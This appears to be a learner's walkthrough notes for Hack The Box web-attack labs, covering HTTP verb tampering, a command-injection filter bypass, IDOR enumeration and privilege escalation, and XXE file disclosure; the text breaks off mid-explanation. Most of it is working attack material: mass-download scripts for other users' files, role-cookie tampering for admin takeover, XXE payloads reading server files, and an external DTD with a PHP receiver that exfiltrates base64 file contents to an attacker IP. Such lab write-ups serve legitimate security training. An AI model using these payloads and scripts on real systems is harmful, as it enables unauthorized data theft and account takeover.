WEB ATTACKS

BYPASSING BASIC AUTHENTICATION

Try to use what you learned in this section to access the 'reset.php' page and delete all files. Once all files are deleted, you should get the flag.

#identify the restricted page by walking the application
root@oco:~$ BROWSER > {targetSite:port} >
 * /admin and /admin/reset.php are restricted; 401 unauthorized
 
#identify the HTTP request method used by the web application
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 username field: invalid
 password field: invalid
 * submit expected input
 
BURP > Proxy
 Request
  ...
  GET /admin/reset.php HTTP/1.1
  Host: 83.136.248.51:30992
  Authorization: Basic aW52YWxpZDppbnZhbGlk
  
  * identified GET request
  
#test whether the webapp access other requests such as POST, etc
BURP > Proxy > Change Request Method > Forward
 Request
  ...
  POST /admin/reset.php HTTP/1.1
  Host: 83.136.248.51:30992
  Authorization: Basic aW52YWxpZDppbnZhbGlk
  Content-Type: application/x-www-form-urlencoded

 * after examination, still received 401 Unauthorized
    - this indicates that the web server configurations covers both GET and POST requests
    
    
#test other requests
root@oco:~$ curl -i -X OPTIONS http://83.136.248.51:30992/
 * if the output does not show specific options allowed by the web server, proceed with the test
    - Allow: POST,OPTIONS,HEAD,GET

#test whether the webapp access other requests such as HEAD, PUT, DELETE, PATCH, etc
BURP > Proxy > Change Request Method > Forward
 Request
  ...
  HEAD /admin/reset.php HTTP/1.1                    //changed POST to PUT
  Host: 83.136.248.51:30992
  Authorization: Basic aW52YWxpZDppbnZhbGlk
  Content-Type: application/x-www-form-urlencoded

 * the HEAD method is identical to a GET request but does not return the body 
   in the HTTP response. If this is successful, no output may be received; however, 
   functions should still get executed, which is the main target.
    -  HEAD is the default configuration for many web servers
 * when the PUT HTTP request is used, the /admin/reset.php page will not display any contents
 
root@oco:~$ curl http://94.237.54.116:52333
 * HTB{4lw4y5_c0v3r_4ll_v3rb5}

BYPASSING SECURITY FILTERS

To get the flag, try to bypass the command injection filter through HTTP Verb Tampering, while using the following filename: file; cp /flag.txt ./

#identify the restricted page by walking the application
root@oco:~$ BROWSER > {targetSite:port}
 input field: {arbitraryValue};
 output: Malicious Request Denied!
 * semi-colon is used to test the webapp's security filtering mechanism
 
#intercept & change the request method
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 input field: {arbitraryValue};
 
BURP > Proxy
 Request
  ...
  POST /index.php HTTP/1.1               //changed from GET to POST
  Host: 94.237.54.116:31220
  Referer: http://94.237.54.116:31220/index.php
  Content-Type: application/x-www-form-urlencoded

  filename=test2%3B
  
 * changing the HTTP Request may bypass the security filter
   
#confirm bypass through cmd injection vulnerability
BURP > Proxy > Change Request Method
 input field: cp /flag.txt ./
 
 Request
  ...
  POST /index.php HTTP/1.1               //changed from GET to POST
  POST /index.php HTTP/1.1
  Host: 94.237.54.116:31220
  Referer: http://94.237.54.116:31220/index.php
  Content-Type: application/x-www-form-urlencoded

  filename=cp+%2Fflag.txt+.%2F
  
 * forward the modified request as many times as necessary
  
 * HTB{b3_v3rb_c0n51573n7}

MASS IDOR ENUMERATION

Repeat what you learned in this section to get a list of documents of the first 20 user uid's in /documents.php, one of which should have a '.txt' file with the flag.

#walk the application
root@oco:~$ BROWSER > {targetSite:port}
 Documents
 Contracts
root@oco:~$ BROWSER > {targetSite:port}/documents.php > CTRL+U
 <li class="pure-tree_link">...
root@oco:~$ BROWSER > {targetSite:port}/Contracts.php > CTRL+U
 <li class="pure-tree_link">...
 
#IDOR identification & testing: Plaint-Text URL Parameter value
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 Request
  ...
  POST /documents.php HTTP/1.1
  Host: 94.237.62.184:42702
  Origin: http://94.237.62.184:42702
  Content-Type: application/x-www-form-urlencoded
  Referer: http://94.237.62.184:42702/

  uid=1

 * study the HTTP requests to look for URL parameters or APIs with an object reference
    - this may also be found in other HTTP headers, like cookies.
root@oco:~$ BROWSER > {targetSite:port}
 URL parameter: ?uid={arbitraryValue} or ?filename=file_{arbitraryValue}.pdf

 * try incrementing the values of the object references to retrieve other data
    - changed uid=1 to uid=2 and received
       - GET /documents/Invoice_2_08_2020.pdf HTTP/1.1

#test manual download
root@oco:~$ curl -X POST "http://94.237.62.184:42702/documents.php?uid=1" | grep -oP "\/documents.*?.pdf"
root@oco:~$ ls ~/Downloads
 contract_c4ca4238a0b923820dcc509a6f75849b-1.pdf
 contract_c4ca4238a0b923820dcc509a6f75849b.pdf
 
#verify idor w/ burp
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 Request
  ...
  POST /documents.php HTTP/1.1
  Host: 94.237.62.184:42702
  Origin: http://94.237.62.184:42702
  Content-Type: application/x-www-form-urlencoded
  Referer: http://94.237.62.184:42702/

  uid=1
  
BURP > Proxy > Send to Repeater
 * keep incrementing the "uid" parameter manually

#download all documents from all employees with uids between 1-10
root@oco:~$ nano idorStaticFileEnumeration.sh
#!/bin/bash

url="94.237.62.184:42702"

for i in {1..20}; do
  # Fetch the document links for each user ID
  for link in $(curl -s -X POST "$url/documents.php" -d "uid=$i" | grep -oP "\/documents\/[^']+\.(pdf|txt)"); do
    # Download each file with proper URL construction and quoting
    wget -q -P /home/{targetSite:port}/Downloads/ "${url}${link}"
  done
done
 
root@oco:~$ chmod 777 idorStaticFileEnumeration.sh
root@oco:~$ ./idorStaticFileEnumeration.sh
 flag_11dfa168ac8eb2958e38425728623c98.txt 
root@oco:~$ cat flag_11dfa168ac8eb2958e38425728623c98.txt
 * HTB{4ll_f1l35_4r3_m1n3}

BYPASSING ENCODED REFERENCES

Try to download the contracts of the first 20 employee, one of which should contain the flag, which you can read with 'cat'. You can either calculate the 'contract' parameter value, or calculate the '.pdf' file name directly.

#walk the application
root@oco:~$ BROWSER > {targetSite:port}
 Documents
 Contracts
root@oco:~$ BROWSER > {targetSite:port}/documents.php > CTRL+U
 <li class="pure-tree_link">...
root@oco:~$ BROWSER > {targetSite:port}/contracts.php > CTRL+U
 <li class="pure-tree_link">...
 
  ...
 javascript:downloadContract('1')
 
  <script>
    function downloadContract(uid) {
      window.location = `/download.php?contract=${encodeURIComponent(btoa(uid))}`;
    }
  </script>
 
 * the javascript calls the downloadContract() and passes the uid
   the value being hashed is btoa(uid), which is the base64 encoded string of the uid variable, which is an input argument for the function.
   it is calling downloadContract('1') and the final value being used in the POST request is the base64 encoded string of 1, which was then md5 hashed.
 
#IDOR identification & testing
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 Request
  ...
  GET /download.php?contract=MQ%3D%3D HTTP/1.1
  Host: 94.237.62.184:42702
  Origin: http://94.237.62.184:42702
  Content-Type: application/x-www-form-urlencoded
  Referer: http://94.237.62.184:42702/

  * MQ%3D%3D is a URL encoded of MQ==; which is just the digit '1'
  
root@oco:~ echo -n 1 | base64 -w 0
 MQ==
 * the -n flag is used to exclude the trailing new line from the output
 * the the -w 0 flag with base64 is used to avoid adding newlines

 * compare this with the one on the HTTP request

#test manually
root@oco:~$ for i in {1..20}; do echo -n $i | base64; done
MQ==
Mg==
Mw==
NA==
NQ==
Ng==
Nw==
OA==
OQ==
MTA=
MTE=
MTI=
MTM=
MTQ=
MTU=
MTY=
MTc=
MTg=
MTk=
MjA= 
 
 * test each output as values to the parameter contract=...
 
BURP > Repeater
 Request
  ...
  GET /download.php?contract=MQ%3D%3D HTTP/1.1
  Host: 94.237.62.184:34855
  Referer: http://94.237.62.184:34855/contracts.php
  
 Response
  HTTP/1.1 200 OK
  Date: Tue, 31 Dec 2024 03:13:25 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Description: File Transfer
  Content-Disposition: attachment; filename="contract_c4ca4238a0b923820dcc509a6f75849b.pdf"
  Pragma: public
  Content-Type: application/pdf

#create test script
for i in {1..10}; do $(echo -n $i | base64 -w 0); done
 
#download all documents from all employees with uids between 1-20
root@oco:~$ nano encodedReferences.sh
#!/bin/bash

url="http://94.237.50.242:58709/download.php?contract="

for i in {1..20}; do
    for hash in $(echo -n $i | base64 -w 0); do
        curl -sOJG $url$hash --data-urlencode "$hash"
    done
done

 * The -G option in curl is used to specify that the request should be a GET request, 
   even if other options (such as -d) specify data to be sent. By default, curl sends 
   a POST request when using the -d option to include data. The -G option overrides 
   this, ensuring that the data is appended to the URL as query parameters, rather 
   than being sent in the body of the request.
 * the -J means Remote header name:
    - it instructs curl to use the filename provided by the server in the Content-Disposition response header, if available.
       - if the server responds with a header like such as Content-Disposition: attachment; filename="example.txt" curl will save the downloaded file as example.txt instead of the default behavior (saving it with the last segment of the URL).
 * use -X POST -d "contract=$hash" for POST instead of GET request (if required)

root@oco:~$ bash ./encodedReferences.sh
root@oco:~$ ls
 contract_1679091c5a880faf6fb5e6087eb1b2dc.pdf
 contract_1f0e3dad99908345f7439f8ffabdffc4.pdf
 contract_45c48cce2e2d7fbdea1afc51c7c6ad26.pdf
 contract_6512bd43d9caa6e02c990b0a82652dca.pdf
 contract_6f4922f45568161a8cdf4ad2299f6d23.pdf
 contract_70efdf2ec9b086079795c442636b55fb.pdf
 contract_8f14e45fceea167a5a36dedd4bea2543.pdf
 contract_98f13708210194c475687be6106a3b84.pdf
 contract_9bf31c7ff062936a96d3c8bd1f8f2ff3.pdf
 contract_a87ff679a2f3e71d9181a67b7542122c.pdf
 contract_aab3238922bcc25a6f606eb525ffdc56.pdf
 contract_c20ad4d76fe97759aa27a0c99bff6710.pdf
 contract_c4ca4238a0b923820dcc509a6f75849b.pdf
 contract_c51ce410c124a10e0db5e4b97fc2af39.pdf
 contract_c74d97b01eae257e44aa9d5bade97baf.pdf
 contract_c81e728d9d4c2f636f067f89cc14862c.pdf
 contract_c9f0f895fb98ab9159f51fd0297e236d.pdf
 contract_d3d9446802a44259755d38e6d163e820.pdf
 contract_e4da3b7fbbce2345d7772b0674a318d5.pdf
 contract_eccbc87e4b5ce2fe28308fd9f2a7baf3.pdf

root@oco:~$ cat *
 * HTB{h45h1n6_1d5_w0n7_570p_m3}

IDOR IN INSECURE APIS

Try to read the details of the user with 'uid=5'. What is their 'uuid' value?

root@htb:~$ BROWSER > {targetSite:port} > Edit Profile
BURP > Proxy
 Request
  ...
  POST /profile/index.php HTTP/1.1 > {Forward}
   - this particular request MUST be forwarded as it contains security controls
  ...
  GET /profile/api.php/profile/1 HTTP/1.1 > Send to Repeater

BURP > Repeater
 Request
  ...
  GET /profile/api.php/profile/1 HTTP/1.1                 //change /1 to /5
  Host: 94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

 Response
  ...
  HTTP/1.1 200 OK
  Date: Wed, 01 Jan 2025 01:59:44 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Vary: Accept-Encoding
  Content-Length: 177
  Connection: close
  Content-Type: text/html; charset=UTF-8

  {
    "uid":"5",
    "uuid":"eb4fe264c10eb7a528b047aa983a4829",
    "role":"employee",
    "full_name":"Callahan Woodhams",
    "email":"[email protected]",
    "about":"I don't like quoting others!"
  }

CHAINING IDOR VULNERABILITIES

Try to change the admin's email to '[email protected]', and you should get the flag on the 'edit profile' page.

#identification - walk the application - carefully examine, test, and analyze how an application works
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile
 Full Name:
 Email:
 About:
 
#test for information disclosure
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 Request
  ...
  GET /profile/api.php/profile/1 HTTP/1.1                  //change the /1 to /5 to test IDOR information disclosure
  Host: 94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee
  
  * on some occassions the data is in an encoded form such as:
     - data
        - contract=cdd96d3cc73d1dbdaffa03cc6cd7339b
        - uid=MQ%3D%3D
        - uid=1
     - URL
        - /download.php?contract=MQ%3D%3D
        
 * once idor information disclosure is identified, it can be used to perform idor insecure function calls
    - try to update the other user's info and intercept the traffic via BURP
       - this will reveal the other user's hidden info such as uid, uuid, etc

#information disclosure
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/1 HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"Callahan Woodhams",
    "email":"[email protected]",
    "about":"I don't like quoting others!"
  }
  
 * keep modifying the parameter value until an administrator account is identified

#test security controls in place by manipulating the other parameters.
# * Change other user's uid to see if account takeover is possible
# * Create new users with arbitrary details, or delete existing users
# * Change other user's details to see if other web attacks are possible
# * Change to a more privileged role (e.g. admin) IOT perform more actions

# * HTTP Request methods
#    - PUT requests are used in APIs to update item details
#    - POST is used to create new items
#    - DELETE is used to delete items
#    - GET is used to retrieve item details.

#Change other user's uid to see if account takeover is possible
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/{2} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":{2},
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"Callahan Woodhams",
    "email":"[email protected]",
    "about":"I don't like quoting others!"
  }
  
 * unsuccessful: uuid mismatch
    - the webapp might be checking if the uuid value matches the user's uid

#Create new users with arbitrary details, or delete existing users
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  {POST} /profile/api.php/profile/{50} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":50,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"test",
    "email":"[email protected]",
    "about":"N/A"
  }
  
 * unsuccessful: Creating new employees is for admins only
 
#Deleting existing users
root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  {DELETE} /profile/api.php/profile/{50} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role=employee

  {
    "uid":50,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"employee",
    "full_name":"test",
    "email":"[email protected]",
    "about":"N/A"
  }
  
 * unsuccessful: Deleting employees is for admins only

root@oco:~$ BROWSER > {targetSite:port} > Update
BURP > PROXY
 Request
  ...
  {PUT} /profile/api.php/profile/{1} HTTP/1.1
  Host: 94.237.62.184:50737
  Content-type: application/json
  Origin: http://94.237.62.184:50737
  Referer: http://94.237.62.184:50737/profile/index.php
  Cookie: role={admin}

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"{admin}",
    "full_name":"test",
    "email":"[email protected]",
    "about":"N/A"
  }
  
 * unsuccessful: Invalid role

#identify users with privileges
#perform a manual test for use in an enumeration script
root@oco:~$ curl -G "http://94.237.59.180:35708/profile/api.php/profile/1" | grep -i "about" --color=auto

#create an enumeration script
root@oco:~$ nano script.sh
#!/bin/bash

url="94.237.59.180:35708"

for i in {1..10}; do
  # Fetch the document links for each user ID
  curl -G "http://94.237.59.180:35708/profile/api.php/profile/$i" | grep -i "about"
done

root@oco:~$ bash script.sh
 {"uid":"10","uuid":"bfd92386a1b48076792e68b596846499","role":"staff_admin","full_name":"admin","email":"[email protected]","about":"Never gonna give you up, Never gonna let you down"}

#access the admin profile & takeover the admin's account or set the attacker's profile to admin
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/1 HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"{staff_admin}",
    "full_name":"31137",
    "email":"[email protected]",
    "about":"Pwned."
  }

#verify change and updated privileges
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  PUT /profile/api.php/profile/1 HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"{staff_admin}",
    "full_name":"31137",
    "email":"[email protected]",
    "about":"Pwned."
  }

root@oco:~$ curl -G "http://94.237.50.242:41103/profile/api.php/profile/1" | grep -i "about" --color=auto
 {"uid":"1","uuid":"40f5888b67c748df7efba008e7c2f9d2","role":"staff_admin","full_name":"31137","email":"[email protected]","about":"Pwned."}

#test obtained privileges
#create/delete a profile/account
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  GET /profile/api.php/profile/{2} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":{2},
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"staff_admin",
    "full_name":"31137",
    "email":"[email protected]",
    "about":"Pwned."
  }
  
  DELETE /profile/api.php/profile/{2} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role=staff_admin

  {
    "uid":1,
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"staff_admin",
    "full_name":"31137",
    "email":"[email protected]",
    "about":"Pwned."
  }

#test obtained privileges
#modify other user's data such as email addresses - setting email addresses to an attacker specified email can be used in a password reset attack & account takeover
root@oco:~$ BROWSER > {targetSite:port} > Edit Profile > Update Profile
BURP > PROXY
 Request
  ...
  GET /profile/api.php/profile/{10} HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role={staff_admin}
  Connection: close

  {
    "uid":{10},
    "uuid":"40f5888b67c748df7efba008e7c2f9d2",
    "role":"staff_admin",
    "full_name":"31137",
    "email":"[email protected]",
    "about":"Pwned."
  }
  
  PUT /profile/api.php/profile/10 HTTP/1.1
  Host: 94.237.50.242:41103
  Content-type: application/json
  Origin: http://94.237.50.242:41103
  Referer: http://94.237.50.242:41103/profile/index.php
  Cookie: role=employee
  Connection: close

  {
    "uid":10,
    "uuid":"bfd92386a1b48076792e68b596846499",
    "role":"employee",
    "full_name":"Callahan Woodhams",
    "email":"[email protected]",
    "about":"I don't like quoting others!"
  }

 * HTB{1_4m_4n_1d0r_m4573r}

LOCAL FILE DISCLOSURE

Try to read the content of the 'connection.php' file, and submit the value of the 'api_key' as the answer.

#once the internal XML entities are validated - use external file entities keyword to test for local file disclosure
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 ...
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /submitDetails.php HTTP/1.1
   <?xml version="1.0" encoding="UTF-8"?>
    <root>
     <name>First</name>
     <tel></tel>
     <email>[email protected]</email>
     <message>This is a test email</message>
    </root>

 * forms that appears to be sending user input data in an XML format can be tested for potential XXE vulnerability
    - the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed

#identify which elements are being displayed IOT know which elements to inject malicious xml input
#if no elements are displayed, utilize blind xxe injection method
BURP > Repeater
 Request
  ...
   <?xml version="1.0" encoding="UTF-8"?>
    <root>
     <name>learning</name>
     <tel>1234567890</tel>
     <email>[email protected]</email>
     <message>which field is xxe vulnerable?</message>
    </root>
 
 Response
  ...
  HTTP/1.1 200 OK
   check your email [email protected] for verification...
  
 * the email field is reflected in the response and may be vulnerable to xxe injection

#perform test & exploit xxe vulnerability to read local files on the back-end server
#other posibilities: id_rsa ssh key disclosure
#in certain Java webapps, attackers may be able to specify a directory instead of a file to get a directory listing instead
BURP > Repeater
 Request
  ...
  POST /submitDetails.php HTTP/1.1
   <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE email [
    <!ENTITY srcCode SYSTEM "php://filter/convert.base64-encode/resource=index.php">
    ]>
    <root>
     <name>First</name>
     <tel></tel>
     <email>&srcCode;</email>
     <message>This is a test email</message>
    </root>
    
 * if there is an xxe vulnerability, the XML entity named 'srcCode' which is referenced by &srcCode;
   should be replaced with the value defined (index.php)
    
 Response
  ...
  HTTP/1.1 200 OK
   Check your email PD9waHAKCiRhcGlfa2V5ID0gIlVUTTFOak0wTW1SekoyZG1jVEl6TkQwd01YSm5aWGRtYzJSbUNnIjsKCnRyeSB7CgkkY29ubiA9IHBnX2Nvbm5lY3QoImhvc3Q9bG9jYWxob3N0IHBvcnQ9NTQzMiBkYm5hbWU9dXNlcnMgdXNlcj1wb3N0Z3JlcyBwYXNzd29yZD1pVWVyXnZkKGUxUGw5Iik7Cn0KCmNhdGNoICggZXhjZXB0aW9uICRlICkgewogCWVjaG8gJGUtPmdldE1lc3NhZ2UoKTsKfQoKPz4K for further instructions.
    - this is a base64 encoded string and MUST be decoded
   ...
   
 * This trick only works with PHP web applications
 
 * if the HTTP response displayed the xxe reference element "&srcCode;"
   instead of the raw value "index.php contents" then the webapp isn't vulnerable
   to XXE Injection. 
   
 * if the XML input in the HTTP request had no DTD being declared within the XML data itself, or being referenced externally,
   DTD should be added before defining an entity; if the DOCTYPE is already declared in the XML request,
   only the ENTITY element is required
   
root@oco:~$ echo -n "PD9waHAKCiRhcGlfa2V5ID0gIlVUTTFOak0wTW1SekoyZG1jVEl6TkQwd01YSm5aWGRtYzJSbUNnIjsKCnRyeSB7CgkkY29ubiA9IHBnX2Nvbm5lY3QoImhvc3Q9bG9jYWxob3N0IHBvcnQ9NTQzMiBkYm5hbWU9dXNlcnMgdXNlcj1wb3N0Z3JlcyBwYXNzd29yZD1pVWVyXnZkKGUxUGw5Iik7Cn0KCmNhdGNoICggZXhjZXB0aW9uICRlICkgewogCWVjaG8gJGUtPmdldE1lc3NhZ2UoKTsKfQoKPz4K" | base64 -d
 <?php
  $api_key = "UTM1NjM0MmRzJ2dmcTIzND0wMXJnZXdmc2RmCg";
  try {
   $conn = pg_connect("host=localhost port=5432 dbname=users user=postgres password=iUer^vd(e1Pl9");
  }
  catch ( exception $e ) {
   echo $e->getMessage();
  }
 ?>
 
 * ALT: https://cyberchef.io/
    input: {base64 encoded string}
    Recipe: From Base64
    output: ...index.php source code
 * ALT: BURP > {right-click the base64 encoded string} > Send to Burp Inspector

ADVANCED FILE DISCLOSURE

Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').

#once the internal XML entities are validated - use external file entities keyword to test for local file disclosure
#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: 127.0.0.1
 ...
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /submitDetails.php HTTP/1.1
   <?xml version="1.0" encoding="UTF-8"?>
    <root>
     <name>First</name>
     <tel></tel>
     <email>[email protected]</email>
     <message>This is a test email</message>
    </root>

 * forms that appears to be sending user input data in an XML format can be tested for potential XXE vulnerability
    - the target page may be vulnerable to XXE injection if the user input isn't properly sanitized or safely parsed

#identify which elements are being displayed IOT know which elements to injext malicious xml input
#if no elements are displayed, utilize blind xxe injection method
BURP > Repeater
 Request
  ...
   <?xml version="1.0" encoding="UTF-8"?>
    <root>
     <name>First</name>
     <tel></tel>
     <email>[email protected]</email>
     <message>This is a test email</message>
    </root>
 Response
  ...
  HTTP/1.1 200 OK
   check your email [email protected] for verification...
  
 * the email field is reflected in the response and may be vulnerable to xxe injection

#joining internal & external entity with XML Parameter entities
#the XML parameter entities % can only be used within the DTD
root@oco:~$ echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
 * this external entity file (xxe.dtd) MUST be references from an external source such as the attacker's OWKS IOT to be joined with the internal entities
    - aftward, all of them would be considered as external and can be joined
root@oco:~$ python3 -m http.server 8888

BURP > Repeater
 Request
 ...
  <?xml version="1.0" encoding="UTF-8"?>
   <!DOCTYPE email [
   <!ENTITY % begin "<![CDATA[">
   <!ENTITY % file SYSTEM "file:////flag.php"> 
   <!ENTITY % end "]]>">
   <!ENTITY % xxe SYSTEM "http://10.10.14.211:8888/xxe.dtd">
   %xxe;
  ]>
  <root>
   <name>First</name>
   <tel></tel>
   <email>&joined;</email>
   <message>This is a test email</message>
  </root>
  
 Response
  ...
  Check your email <?php $flag = "HTB{3rr0r5_c4n_l34k_d474}"; ?> for further instructions.

 * the 'begin' keyword is defined first to indicate an internal entity with <![CDATA[, 
   the 'end' keyword terminates the internal entity with ]]>
   the external entity 'file' keyword is then placed in between such as 'file:///var/www/html/submitDetails.php'
   this should then be considered as a CDATA element.
   
 * In some modern web servers, we may not be able to read some files (like index.php), as the web server would be preventing a DOS attack caused by file/entity self-reference (i.e., XML entity reference loop)

BLIND DATA EXFILTRATION

Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.

#find web pages that accept an XML user input
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: ...
 ...
 * submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /blind/submitDetails.php HTTP/1.1
  Host: 10.129.73.189
  Content-Type: text/plain;charset=UTF-8
  Accept: */*
  Origin: http://10.129.73.189
  Referer: http://10.129.73.189/blind/
  Connection: close

  <?xml version="1.0" encoding="UTF-8"?>
   <root>
    <name>testName</name>
    <tel>1234567890</tel>
    <email>[email protected]</email>
    <message>test msg</message>
   </root>

#identify which elements are being displayed IOT know which elements to inject malicious xml input
#if no elements are displayed, utilize blind xxe injection method or switch to error-based discovery
BURP > Repeater
 Request
  ...
  <?xml version="1.0" encoding="UTF-8"?>
   <root>
    <name>testName</name>
    <tel>1234567890</tel>
    <email>[email protected]</email>
    <message>test msg</message>
   </root>
   
 Response
  ...
  HTTP/1.1 200 OK
   check your email for further instructions.
  
 * no elements are reflected in the response...

#test error-based xxe
BURP > Repeater
 Request
  ...
  <?xml version="1.0" encoding="UTF-8"?>
   <root>
    <name>testName</name>
    <tel>1234567890</tel>
    <email>&nonExistingEntity;</email>
    <message>test msg</message>
   </root>
   
 Response
  ...
  HTTP/1.1 200 OK
   Check your email for further instructions.
  
 * no elements are reflected in the response...
 
 * if the web application displays an error, it may reveal the web server directory, which can be used to read the source code of other files

 * ALT: delete any of the closing tag so, it does not close (e.g. <roo> instead of <root>

#joining internal & external entity with XML Parameter entities
#the XML parameter entities % can only be used within the DTD
root@oco:~$ nano xxe.dtd
 <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/327a6c4304ad5938eaf0efb6cc3e53dc.php">
 <!ENTITY % oob "<!ENTITY content SYSTEM 'http://10.10.14.49:8888/?content=%file;'>">
 
 * the first line a parameter entity for the content of the file we are reading on the target machine while utilizing PHP filter to base64 encode it.
 * the second line is an external parameter entity that references the attacker's URL
 
 * step-by-step process
    - When the XML parser processes the XML file, it encounters the %file entity and 
      resolves it to the external resource specified by 
      php://filter/convert.base64-encode/resource=/etc/passwd.
      This means that the attacker is instructing the parser to read the /etc/passwd 
      file, and the contents of that file will be Base64-encoded.
      However, the Base64-encoded content is not directly retrieved by the attacker 
      yet. It's stored in the %file entity.
    - After resolving %file, the %oob entity is processed, which contains the HTTP 
      request. The attacker’s server (http://OUR_IP:8000/) is contacted with the query 
      parameter content=%file, which includes the Base64-encoded contents of the 
      /etc/passwd file. The XML parser triggers the HTTP request to the attacker's 
      server, and the encoded contents of /etc/passwd are sent to the attacker's 
      server as the content parameter in the URL. 

#script that automatically detects the encoded file content, decodes it, and outputs it to the terminal
root@oco:~$ nano index.php
 <?php
   if(isset($_GET['content'])){
     error_log("\n\n" . base64_decode($_GET['content']));
   }
 ?>

root@oco:~$ php -S 0.0.0.0:8888
 * the -S option tells PHP to start its built-in web server

#execution
BURP > Repeater
 Request
  ...
  POST /blind/submitDetails.php HTTP/1.1
  Host: 10.129.73.189
  Content-Type: text/plain;charset=UTF-8
  Accept: */*
  Origin: http://10.129.73.189
  Referer: http://10.129.73.189/blind/
 
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://{attackerIP:port}/xxe.dtd">
  %remote;
  %oob;
 ]>
 <root>&content;</root>
 
 * Send the request
 
 * step-by-step process
    - When the XML parser processes the XML file, it encounters the %file entity and 
      resolves it to the external resource specified by 
      php://filter/convert.base64-encode/resource=/etc/passwd.
      This means that the attacker is instructing the parser to read the /etc/passwd 
